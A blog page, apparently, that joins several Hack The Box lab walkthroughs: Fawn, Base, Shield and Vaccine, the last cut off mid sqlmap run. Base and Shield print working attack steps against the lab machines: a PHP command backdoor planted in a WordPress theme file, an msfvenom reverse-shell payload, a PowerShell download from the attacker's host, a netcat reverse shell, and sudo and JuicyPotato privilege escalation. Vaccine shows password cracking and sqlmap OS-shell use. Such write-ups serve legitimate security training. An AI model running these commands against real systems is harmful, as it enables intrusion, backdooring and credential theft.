Hello world, welcome to haxez, and thank you for stopping by. Today we’re looking at the Hack The Box Machine Fawn. It’s a super easy box that requires you to enumerate the services on the box and then utilize those services to capture the flag. There are also a number of questions that you need to answer to own the machine.

Spawn Fawn

The first thing we need to do is to spawn an instance of the machine. However, a prerequisite of spawning the machine is connecting to the VPN. I’ve covered this before in my Meow walkthrough so have a look there if you don’t know where to start. Once you have connected and spawned a machine you will be given an IP address.

Ping The Thing

In order to check that we can communicate with the machine, we can use the tool ping to see if it responds to our ICMP packets. This can be run from the terminal by typing ping followed by the IP address of the box. As you can see from the output below, I sent four ping requests to the machine and it responded successfully.

┌──(kali㉿kali)-[~]
└─$ ping 10.129.247.20 
PING 10.129.247.20 (10.129.247.20) 56(84) bytes of data.
64 bytes from 10.129.247.20: icmp_seq=1 ttl=63 time=15.2 ms
64 bytes from 10.129.247.20: icmp_seq=2 ttl=63 time=14.3 ms
64 bytes from 10.129.247.20: icmp_seq=3 ttl=63 time=14.7 ms
64 bytes from 10.129.247.20: icmp_seq=4 ttl=63 time=14.9 ms
--- 10.129.247.20 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3004ms
rtt min/avg/max/mdev = 14.349/14.776/15.169/0.293 ms

A Lap With Nmap

Now that we know we can communicate with the Fawn machine, we need to enumerate what services the machine is running. We can do this using our favorite network mapping tool Nmap. It is good practice to throw some additional flags or arguments onto your Nmap scan in order to get as much information from the scan as possible. For this reason, we are going to tell Nmap to report back the service and operating system versions. The output below shows that the machine is running vsftpd version 3.0.3 and that the base operating system is Unix.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p0- 10.129.247.20
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 12:36 EDT
Nmap scan report for 10.129.247.20
Host is up (0.017s latency).
Not shown: 65535 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=5/8%OT=21%CT=1%CU=37672%PV=Y%DS=2%DC=I%G=Y%TM=6277F198
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=103%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11
OS:NW7%O6=M505ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%R
OS:UCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Unix
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.38 seconds

Fawn FTP Anonymity

FTP or File Transfer Protocol is a service that allows you to transfer files between a client and server. There are many clients out there including terminal and graphical based ones. One FTP misconfiguration that can be taken advantage of is the anonymous login feature. Anonymous login is just that, it allows you to log in anonymously. You don’t need to know the username or password of an existing user. You just have to specify your name as Anonymous and submit anything for a password. If Anonymous logins are supported then you will be granted access to the files on the FTP server. As you can see below, Anonymous logins are supported by the server and we can log in and view the files using the dir command.

┌──(kali㉿kali)-[~]
└─$ ftp 10.129.60.207                                                           
Connected to 10.129.60.207.
220 (vsFTPd 3.0.3)
Name (10.129.60.207:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||43096|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
226 Directory send OK.

Grab The Fawn Flag

The Fawn FTP server appears to have a text file on it called flag.txt Perhaps this is the elusive root flag that we need to capture. In order to download the flag we can use the get command. The get command allows you to download files from the server and you can see an example of me using it to download the flag below.

ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||31037|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |*****************************************************************    32       21.00 KiB/s    00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (0.60 KiB/s)

Once the flag has been downloaded, you can use the cat command to view the contents of the file.

┌──(kali㉿kali)-[~]
└─$ cat flag.txt   
035db21c881520061c53e0536e44f815

Fawn Questions And Answers

Before we can submit the root flag, there are a number of questions that we need to answer. I will run through these questions now.

Firstly, What does the 3-letter acronym FTP stand for? File Transfer Protocol

What does the 3-letter acronym FTP stand for? Fawn — What does the 3-letter acronym FTP stand for?

What communication model does FTP use, architecturally speaking? Client-Server Model

What communication model does FTP use, architecturally speaking? Fawn — What communication model does FTP use, architecturally speaking?

What is the name of one popular GUI FTP program? Filezilla

Which port is the FTP service active on usually? 21 TCP

What acronym is used for the secure version of FTP? SFTP

What is the command we can use to test our connection to the target? Ping

From your scans, what version is FTP running on the target? vsftpd 3.0.3

From your scans, what OS type is running on the target? Unix

Submit root flag

Hack The Box – Base

Posted on January 12, 2025January 12, 2025 by haxez

Hello world, welcome to haxez where in this post I will be taking a look at the Hack The Box Machine Base. This is the final machine of the Starting Point category on Hack The Box. I’ve been looking forward to doing this machine since I completed the last one. In traditional techy fashion however, I‘ve just spent most of the evening trying to work out why my Virtual Machine kept crashing. For some reason it kept producing invalid memory address registers. After an update, a reboot, and some tinkering, it now appears to be fine. That has nothing to do with this though so let’s jump right in.

Base Enumeration

Ok so first, after spawning the machine we ping it to check that it’s online.

[10.10.14.57]─[joe@parrot]─[/media/sf_E_DRIVE/OneDrive/Hack The Box/Machines/Base/Output]
└──╼ [★]$ sudo ping 10.10.10.48 | tee -a ping.10.10.10.48.txt
PING 10.10.10.48 (10.10.10.48) 56(84) bytes of data.
64 bytes from 10.10.10.48: icmp_seq=1 ttl=63 time=21.6 ms
64 bytes from 10.10.10.48: icmp_seq=2 ttl=63 time=20.5 ms

The machine is talking to us! we have it right where we want it! Time to hit it with nmap.

[10.10.14.57]─[joe@parrot]─[/media/sf_E_DRIVE/OneDrive/Hack The Box/Machines/Base/Output]
└──╼ [★]$ sudo nmap -sC -sV -O -p0- 10.10.10.48 | tee -a nmap.10.10.10.48.txx
Starting Nmap 7.91 ( https://nmap.org ) at 2021–09–14 17:41 BST
Nmap scan report for 10.10.10.48
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f6:5c:9b:38:ec:a7:5c:79:1c:1f:18:1c:52:46:f7:0b (RSA)
|_ 256 b8:65:cd:3f:34:d8:02:6a:e3:18:23:3e:77:dd:87:40 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Kicking off Dirb

It looks like we have a webserver running on Ubuntu. Before I look at the site, I will launch a dirb scan to check for any interesting directories.

[10.10.14.57]─[joe@parrot]─[/media/sf_OneDrive/Hack The Box/Machines/Base/Scripts]
└──╼ [★]$ sudo dirb http://10.10.10.48 /usr/share/dirb/wordlists/big.txt -w
— — — — — — — -
DIRB v2.22 
By The Dark Raver
— — — — — — — — -
START_TIME: Tue Sep 14 22:51:33 2021
URL_BASE: http://10.10.10.48/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt
OPTION: Not Stopping on warning messages
 — — — — — — — — -
GENERATED WORDS: 20458
— — Scanning URL: http://10.10.10.48/ — — 
==> DIRECTORY: http://10.10.10.48/_uploaded/ 
==> DIRECTORY: http://10.10.10.48/login/ 
+ http://10.10.10.48/server-status (CODE:403|SIZE:276) 
==> DIRECTORY: http://10.10.10.48/static/ 
— — Entering directory: http://10.10.10.48/_uploaded/ — — 
(!) WARNING: Directory IS LISTABLE. No need to scan it. 
 (Use mode ‘-w’ if you want to scan it anyway)
— — Entering directory: http://10.10.10.48/login/ — — 
(!) WARNING: Directory IS LISTABLE. No need to scan it. 
 (Use mode ‘-w’ if you want to scan it anyway)
- — Entering directory: http://10.10.10.48/static/ — — 
(!) WARNING: Directory IS LISTABLE. No need to scan it. 
 (Use mode ‘-w’ if you want to scan it anyway)
==> DIRECTORY: http://10.10.10.48/static/fonts/ 
==> DIRECTORY: http://10.10.10.48/static/images/

Base Directory Listing

Interesting, it looks like the server is configured to allow directory listings. This is significant security oversight. This allows us to browse the directories and determine the file structure. This setting can easily be changed in the server configuration but for now let’s leverage that weakness and snoop around.

PHP Login Logic

There are some interesting directories and files on the server, one of which is named login.php.swp and contains the following PHP code:

<?php
session_start();
if (!empty($_POST[‘username’]) && !empty($_POST[‘password’])) {
require(‘config.php’);
if (strcmp($username , $_POST[‘username’]) == 0) {
if (strcmp($password, $_POST[‘password’]) == 0) {
$_SESSION[‘user_id’] = 1;
header(“Location: upload.php”)
} else {
print(“<script>alert(‘Wrong Username or Password’)</script>”);
}} else {
print(“<script>alert(‘Wrong Username or Password’)</script>”);
}

It appears as if the username and passwords are being put in to a short array and checked with strcmp. By intercepting and changing the request in Burp we can break the syntax with an array of our own, and can cause the application to misbehave and hopefully bypass authentication. First, we will need to navigate to the site and submit a login request. We will then need to ensure the browser is configured to send the requests to Burp and that Burp intercept is on.

Second, As soon as Burp has intercepted the request we need to modify it slightly to add our own empty arrays. These arrays need to be added at the end of username and password before the input is received. You can see from the screenshot below that I have added an open and close square bracket to add the array.

Base Application Foodhold

Finally, we forward the request, and the subsequent set-cookie request with Burp and wait for the web application to respond. The page we are redirected to is an upload page. We know from our dirb results that there is an _uploaded directory. If we assume that is where the file upload puts files then we should be able to upload a reverse shell and capture it from there.

Reverse Shell

I used the pentestermonkey’s PHP Reverse Shell and uploaded it to the application. I started my netcat listener and then curled the URL to trigger the PHP reverse shell.

[10.10.14.57]─[joe@parrot]─[/media/sf_OneDrive/Hack The Box/Machines/Base/Scripts]
└──╼ [★]$ sudo curl http://10.10.10.48/_uploaded/shell.php

As expected. The shell worked and I was given acces to the box. Before we do anything else, we need to upgrade our shell so let’s run that Python 1 liner.

$ python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
www-data@base:/$

Base Host Enumeration

Now that that’s sorted, let’s check out the rest of the website files. When websites connect to databases, they require a database configuration file. Database configuration files contain passwords that could be used to gain access to sensitive information. There are other files like htaccess and htpasswd that could contain sensitive information too so it’s always a good idea to check them.

www-data@base:/$ cat /var/www/html/login/config.php
cat /var/www/html/login/config.php
<?php
$username = “admin”;
$password = “thisisagoodpassword”;

*Smug grin intensifies* The config.php file contains a password. We know this is the password that is required to login to the application, but we don’t know whether it has been reused on the system anywhere. With that in mind, let’s check the home directory and see what users are on the system.

www-data@base:/$ ls /home
john
www-data@base:/$ ls /home/john
user.txt

Sorry John but it looks like you are going to be our victim today. I’m sure you’re lovely guy but if you have reused your password then you deserved to be pwned! (joking, or am I?). Now that we have a username and password, Lets try and switch user to john.

www-data@base:/$ su john
su john
Password: thisisagoodpassword
john@base:/$

I believed in you john and you let me down. While we’re here lets grab the user flag from johns home directory.

john@base:/$ cat /home/john/user.txt
cat /home/john/user.txt
0011000100110011<haXez>0011001100110111

Base Privilege Escalation

With that out the way, lets see how we can elevate our provides and grab the root flag. The first thing we need to know is what john can run, besides his security posture in to the ground.

john@base:/$ id
uid=1000(john) gid=1000(john) groups=1000(john)john@base:/$ sudo -l
[sudo] password for john: thisisagoodpassword
Matching Defaults entries for john on base:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on base:
(root : root) /usr/bin/find

It appears john has permission to run the find command as root. Shame he couldn’t FIND a better password. Moving forward we should check whether find has any methods of escape, like the one we performed on Guard with the man command. In order to this, I checked the website GTFOBins and it says the following command can be used to escape a restricted shell. Hopefully that means it will drop us in to a root shell.

john@base:/$ sudo find . -exec /bin/sh \; -quit
# whoami
root

Now all that’s left to do is grab the root flag and we’re done with starting point.

# cat /root/root.txt
0011000100110011<haXez>0011001100110111

Hack The Box – Shield

Posted on January 12, 2025January 12, 2025 by haxez

Hello world, welcome to haxez where in this post im going to be looking at the Hack The Box Machine Shield. This box gave me more trouble than I care to admit. I wouldn’t classify it as super easy that’s for sure. I have owned around 30 machines so far and this one was up there on the frustrated me list.

There are other great guides out for this box and I’m not pretending that I’m the first to write a walkthrough for it. artilleryRed, eldruin and many others have written great guides which I had to use to complete this box. I’m writing this merely as a way for me to better understand the techniques used and to document my progress.

Shield Enumeration

So first things first we perform our tried and tested nmap scan and wait for the results.

[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Shield/Output]
└──╼ [★]$ nmap -Pn -sC -sV — min-rate=1000 -T4 -p0- 10.10.10.29PORT STATE SERVICE VERSION
80/tcp open tcpwrapped
| http-methods:
|_ Supported Methods: HEAD OPTIONS
|_http-server-header: Microsoft-IIS/10.0
3306/tcp open tcpwrapped
| mysql-info:
|_ MySQL Error: Host ‘10.10.15.199’ is not allowed to connect to this MySQL server

It looks like we have a webserver and MySQL running so lets go and take a look at the webserver. Upon punching in the IP address we are greeted with a default Internet Information Services page. If we didn’t know before then we can deduct that this is a Windows box.

Shield Internet Information Services Default Page

Crawling Shield

Ok so what else is there on this box, lets brute force the files and folders and see if there is anything that has been left behind by the creator. I used the tool dirb to crawl the files and folders to see whether there was anything interesting.

[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Shield/Output]
└──╼ [★]$ sudo dirb http://10.10.10.29/
DIRB v2.22
By The Dark Raver
— — — — — — — — -
START_TIME: Wed Sep 8 20:37:47 2021
URL_BASE: http://10.10.10.29/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
— — — — — — — — -
GENERATED WORDS: 4612
— — Scanning URL: http://10.10.10.29/ — — 
==> DIRECTORY: http://10.10.10.29/wordpress/
— Entering directory: http://10.10.10.29/wordpress/ — — 
+ http://10.10.10.29/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://10.10.10.29/wordpress/wp-admin/
==> DIRECTORY: http://10.10.10.29/wordpress/wp-content/
==> DIRECTORY: http://10.10.10.29/wordpress/wp-includes/

WordPress

Okie dokie, we have a WordPress content management system installed. WordPress isone of the most used content management system available now. It also has a lot of documentation on how you can rip it to shreds. After poking at it for a bit and not making much progress I looked at a walkthrough and saw that they were using credentials that were found on a previous box. This was one of the things that I found annoying at first. I was treating the box as a stand alone box. I guess thats why hackers have to think outside of the box…

Shield Foothold

Turns out the credentials worked, while reading the official walkthrough I also noticed that they used the Metasploit module wp_admin_shell_upload to get a shell on the box. I tried this and had no luck what so ever. I’ve included my configuration below so you can check it and let me know if I was doing anything wrong. The exploit worked but no session was created, who knows.

Module options (exploit/unix/webapp/wp_admin_shell_upload):
Name Current Setting Required Description
— — — — — — — — — — — — — — — — — — -
PASSWORD P@s5w0rd! yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port
RHOSTS 10.10.10.29 yes The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /wordpress yes The base path to the wordpress application
USERNAME admin yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
— — — — — — — — — — — — — — — — — — — -
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

So with that issue out the way I decided to log in to WordPress and poke around. I have managed to get a reverse shell before by editing the 404 PHP template and sticking a PHP reverse shell in there. In order to trigger it you just need to visit a page that doesn’t exist. Well no such luck on this machine, there is no 404 template. I tried a few other pages with PHP reverse shells but didn’t get anywhere. After this it was getting late so I gave up for the night.

The following day was much more productive. I edited the Single Post single.php file and stuck the simple-backdoor.php script in there.

<! — Simple PHP backdoor by DK (http://michaeldaw.org) →
<?php
if(isset($_REQUEST[‘cmd’])){
 echo “<pre>”;
 $cmd = ($_REQUEST[‘cmd’]);
 system($cmd);
 echo “</pre>”;
 die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<! — http://michaeldaw.org 2006 →

This script is awesome as it allows you to execute commands through the cmd parameter. With that saved to the single.php file it was time to test whether it worked. By calling the following URL it was possible to list the files in the directory where the script was being executed from.

The following command was used to test wether the backdoor was working.

http://10.10.10.29/wordpress/wp-content/themes/highlight/single.php?cmd=dir

Reverse Shell

Now that we have command execution it is time to get on to the box via a reverse shell. In order to do this I created a reverse shell executable using MSFVenom.

sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.199 LPORT=1337 -f exe -e x86/shikata_ga_nai -i 9 -o reverse.exe

With the payload created I started a Python webserver that the Shield machine could connect to and download it. By pasting the following URL in the browser with the additional cmd parameter commands, the machine downloads and saves the reverse shell payload locally.

http://10.10.10.29/wordpress/wp-content/themes/highlight/single.php?cmd=powershell -c “(New-Object Net.Webclient).DownloadFile(‘http://10.10.15.199/reverse.exe','C:\inetpub\wwwroot\wordpress\wp-content\themes\highlight\reverse.exe')"

With the file downloaded on to the server, we need to set up our netcat listener.

sudo nc -lvp 1337

Now time to get the reverse.exe file from the webserver.

http://10.10.10.29/wordpress/wp-content/themes/highlight/single.php?cmd=reverse.exe

Shield Privilege Escalation

Bingo we have access to the box, what now? There is lots of tools out there that you can use to gather information about the host and look for potential privilege escalation paths. One such tool is winPEAS. I won’t go into the details of finding the escalation path but it turns out I needed to use Juicy Potato. This part of the machine was an absolute nightmare, no matter what Class ID I used, the exploit failed. Well one machine reset later and pulling the first CLSID from the list found here and I had a shell back to my host with system.

In order to do this I first downloaded and uploaded JuicyPotato to the system using the same method as the reverse.exe payload. I also did the same with nc.exe. I then created a batch file with the following payload inside.

echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.2 1111 > shell.bat

Once that was in place it was time to run JuicyPotato and invoke the shell.bat file to create a reverse shell back to my host. Make sure you have another listener running on your host ready to accept the connection.

jp.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\themes\highlight\shell.bat -l 9999 -t * -c {03ca98d6-ff5d-49b8-abc6–03dd84127020}

It was then possible to capture the root key via the newly created shell.

PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
6e9XXXXXXXXXXXXXXXXX4fa

Hack The Box – Vaccine

Posted on January 12, 2025January 12, 2025 by haxez

Hello world, welcome to haxez where today we’re looking at Vaccine from Hack The Box. What’s that you say? You don’t know where to begin when trying to hack something? Well, my old chum I’ve got your back. So provided you have permission to hack the target you want to hack and that the rules of engagement have been agreed upon; you start by scanning the box. There are many security tools that can scan a host for vulnerabilities. If you want something quick and easy then check out Nessus, however Nmap is an essential tool that everyone should learn. So connect to the VPN, spin up the box and Nmap the heck out of it.

Vaccine Enumeration

Sudo nmap -sC -sV -O -p0- 10.10.10.46
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu)

FTP

As you can see from the results, port 21 FTP (File Transfer Protocol), port 22 (Secure Shell) and port 80 (HTTP/Web Server) are exposed (not like that). The first thing I checked was whether FTP allowed Anonymous access, it didn’t. I then checked the website, but it required a login. However, after performing some post exploitation investigation on the previous box Oopsie, I found the FTP credentials ftpuser / mc@F1l3ZilL4.

$ ftp 10.10.10.46
Connected to 10.10.10.46.
220 (vsFTPd 3.0.3)
Name (10.10.10.46:joe): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r — r — 1 0 0 2533 Feb 03 2020 backup.zip
226 Directory send OK

Vaccine Hash

Huzzah! The credentials worked and what’s that? A file called backup.zip? I needed to take a look at the contents of that zip file so I downloaded it using the get command. Once the zip file was downloaded, I tried to unzip but it promoted me for a password. The FTP password didn’t work neither did any of the passwords from the previous boxes. Luckily a tool exists that can be used to crack zip file passwords. Zip2john is a tool that creates a hash from a zip file that can then be cracked using johntheripper.


─[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ zip2john backup.zip > hash.txt
─[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ cat hash.txt
backup.zip:$pkzip2$2*2*1*0*8*24*3a41*5722*543fb39ed1a919ce7b58641a238e00f4cb3a826cfb1b8f4b225aa15c4ffda8fe72f60a82*2*0*3da*cca*1b1ccd6a*504*43*8*3da*1b1c*989a*22290dc3505e51d341f31925a7ffefc181ef9f66d8d25e53c82afc7c1598fbc3fff28a17ba9d8cec9a52d66a11ac103f257e14885793fe01e26238915796640e8936073177d3e6e28915f5abf20fb2fb2354cf3b7744be3e7a0a9a798bd40b63dc00c2ceaef81beb5d3c2b94e588c58725a07fe4ef86c990872b652b3dae89b2fff1f127142c95a5c3452b997e3312db40aee19b120b85b90f8a8828a13dd114f3401142d4bb6b4e369e308cc81c26912c3d673dc23a15920764f108ed151ebc3648932f1e8befd9554b9c904f6e6f19cbded8e1cac4e48a5be2b250ddfe42f7261444fbed8f86d207578c61c45fb2f48d7984ef7dcf88ed3885aaa12b943be3682b7df461842e3566700298efad66607052bd59c0e861a7672356729e81dc326ef431c4f3a3cdaf784c15fa7eea73adf02d9272e5c35a5d934b859133082a9f0e74d31243e81b72b45ef3074c0b2a676f409ad5aad7efb32971e68adbbb4d34ed681ad638947f35f43bb33217f71cbb0ec9f876ea75c299800bd36ec81017a4938c86fc7dbe2d412ccf032a3dc98f53e22e066defeb32f00a6f91ce9119da438a327d0e6b990eec23ea820fa24d3ed2dc2a7a56e4b21f8599cc75d00a42f02c653f9168249747832500bfd5828eae19a68b84da170d2a55abeb8430d0d77e6469b89da8e0d49bb24dbfc88f27258be9cf0f7fd531a0e980b6defe1f725e55538128fe52d296b3119b7e4149da3716abac1acd841afcbf79474911196d8596f79862dea26f555c772bbd1d0601814cb0e5939ce6e4452182d23167a287c5a18464581baab1d5f7d5d58d8087b7d0ca8647481e2d4cb6bc2e63aa9bc8c5d4dfc51f9cd2a1ee12a6a44a6e64ac208365180c1fa02bf4f627d5ca5c817cc101ce689afe130e1e6682123635a6e524e2833335f3a44704de5300b8d196df50660bb4dbb7b5cb082ce78d79b4b38e8e738e26798d10502281bfed1a9bb6426bfc47ef62841079d41dbe4fd356f53afc211b04af58fe3978f0cf4b96a7a6fc7ded6e2fba800227b186ee598dbf0c14cbfa557056ca836d69e28262a060a201d005b3f2ce736caed814591e4ccde4e2ab6bdbd647b08e543b4b2a5b23bc17488464b2d0359602a45cc26e30cf166720c43d6b5a1fddcfd380a9c7240ea888638e12a4533cfee2c7040a2f293a888d6dcc0d77bf0a2270f765e5ad8bfcbb7e68762359e335dfd2a9563f1d1d9327eb39e68690a8740fc9748483ba64f1d923edfc2754fc020bbfae77d06e8c94fba2a02612c0787b60f0ee78d21a6305fb97ad04bb562db282c223667af8ad907466b88e7052072d6968acb7258fb8846da057b1448a2a9699ac0e5592e369fd6e87d677a1fe91c0d0155fd237bfd2dc49*$/pkzip2$::backup.zip:style.css, index.php:backup.zip

Cracking The Hash

Now that we generated the hash, it was time to crack it using JohnTheRipper. In order to do this we point john at the hash and tell it which wordlist to use. As with all cracking a good place to start is rockyou.txt.

─[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ sudo john hash.txt — wordlist=/usr/share/wordlists/rockyou.txt
[sudo] password for joe:
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press ‘q’ or Ctrl-C to abort, almost any other key for status
741852963 (backup.zip)
1g 0:00:00:00 DONE (2021–09–07 19:02) 3.703g/s 15170p/s 15170c/s 15170C/s 123456..samanta
Use the “ — show” option to display all of the cracked passwords reliably
Session completed

Woop! looks like the password is 741852963. I tried to extract the zip file again using the password and it worked. The zip archived appeared to contain a CSS file (Cascading Stylesheet and an index.php file.

─[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ unzip backup.zip
Archive: backup.zip
[backup.zip] index.php password:
inflating: index.php
inflating: style.css

Vaccine MD5 Hash

Since the CSS file was only likely to contain website formatting, I looked at the index.php file first. Well what do you know, it looks like the index.php file had an MD5 password hash hardcoded in to the applications authentication mechanism.

<?php
session_start();
if(isset($_POST[‘username’]) && isset($_POST[‘password’])) {
if($_POST[‘username’] === ‘admin’ && md5($_POST[‘password’]) === “2cb42f8734ea607eefed3b70af13bbd3”) {
$_SESSION[‘login’] = “true”;
header(“Location: dashboard.php”);
}}?>

Hashcat

A lot of MD5 password hashes can be cracked online using websites like https://crackstation.net. However, you may not always have internet access especially if you are testing a clients internal infrastructure which doesn’t have internet access. For that reason, I decided to use Hashcat. Hashcat is another cracking tool like JohnTheRipper.

─[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ sudo hashcat -m 0 md5hash.txt /usr/share/wordlists/rockyou.txthashcat (v6.1.1) starting…
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) — Platform #1 [The pocl project]
============================================================
* Device #1: pthread-Intel(R) Core(TM)2 Duo CPU P7550 @ 2.26GHz, 3546/3610 MB (1024 MB allocatable), 2MCU
2cb42f8734ea607eefed3b70af13bbd3:qwerty789
Session……….: hashcat
Status………..: Cracked
Hash.Name……..: MD5
Hash.Target……: 2cb42f8734ea607eefed3b70af13bbd3
Time.Started…..: Tue Sep 7 19:06:05 2021 (0 secs)
Time.Estimated…: Tue Sep 7 19:06:05 2021 (0 secs)
Guess.Base…….: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue……: 1/1 (100.00%)
Speed.#1………: 237.0 kH/s (0.49ms) @ Accel:1024 Loops:1 Thr:1 Vec:4
Recovered……..: 1/1 (100.00%) Digests
Progress………: 100352/14344386 (0.70%)
Rejected………: 0/100352 (0.00%)
Restore.Point….: 98304/14344386 (0.69%)
Restore.Sub.#1…: Salt:0 Amplifier:0–1 Iteration:0–1
Candidates.#1….: Donovan -> pacers1

Vaccine Web Aplication

The hash was successfully cracked, and I must say I was disappointed to learn it was something as simple as qwerty789. Anyway, I was then able to login to the website with the newly cracked password. Upon log in, the website was very basic. The only functionality appeared to be a search box. This instantly made me think the vulnerability was going to be some form of SQL injection. As the website was behind an authentication mechanism, I needed a way to tell SQLMap to authenticate against the application. In order to do this inspected the website and nabbed my PHPSESSID cookie.

Vaccine PHPSESSID Cookie — PHPSESSID Cookie

Vaccine SQL Injection

The first few attempts to scan the host with SQLMap were unsuccessful as no vulnerability was discovered. It had to be an SQL injection vulnerability because I had exhausted all other avenues of attack other than brute forcing the Secure Shell port. After a bit of research and a lot of reading on the HTB forums, it turns out that if another hacker exploits the SQL injection first then it won’t show as vulnerable when scanned again, not 100% sure why (weird). Anyway after requesting to reset the box a billion times I was finally able to see that the search parameter was vulnerable to SQL Injection.

─[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ sudo sqlmap -u ‘http://10.10.10.46/dashboard.php?search=a' — cookie=”PHPSESSID=s6j01lrmbrqh5no9pgjdg3ka2a”[*] starting @ 20:08:00 /2021–09–07/
[20:08:01] [INFO] testing connection to the target URL
[20:08:02] [INFO] testing if the target URL content is stable
[20:08:02] [INFO] target URL content is stable
[20:08:02] [INFO] testing if GET parameter ‘search’ is dynamic
[20:08:02] [INFO] GET parameter ‘search’ appears to be dynamic
[20:08:02] [INFO] heuristic (basic) test shows that GET parameter ‘search’ might be injectable (possible DBMS: ‘PostgreSQL’)
---SNIP---
[20:08:09] [INFO] GET parameter ‘search’ appears to be ‘PostgreSQL > 8.1 stacked queries (comment)’ injectable 
[20:08:09] [INFO] testing ‘PostgreSQL > 8.1 AND time-based blind’
[20:08:12] [INFO] GET parameter ‘search’ appears to be ‘PostgreSQL > 8.1 AND time-based blind’ injectable 
[20:08:12] [INFO] testing ‘Generic UNION query (NULL) — 1 to 20 columns’
GET parameter ‘search’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] n

It was time to see whether we could get a shell on the box through SQLMap.

─[10.10.15.199]─[joe@parrot]─[/media/sf_admin/Vaccine/Output]
└──╼ [★]$ sudo sqlmap -u ‘http://10.10.10.46/dashboard.php?search=a' — cookie=”PHPSESSID=s6j01lrmbrqh5no9pgjdg3ka2a” — os-shell[*] starting @ 20:08:20 /2021–09–07/
[20:08:22] [INFO] resuming back-end DBMS ‘postgresql’
[20:08:22] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: search (GET)
---SNIP---
[20:08:23] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
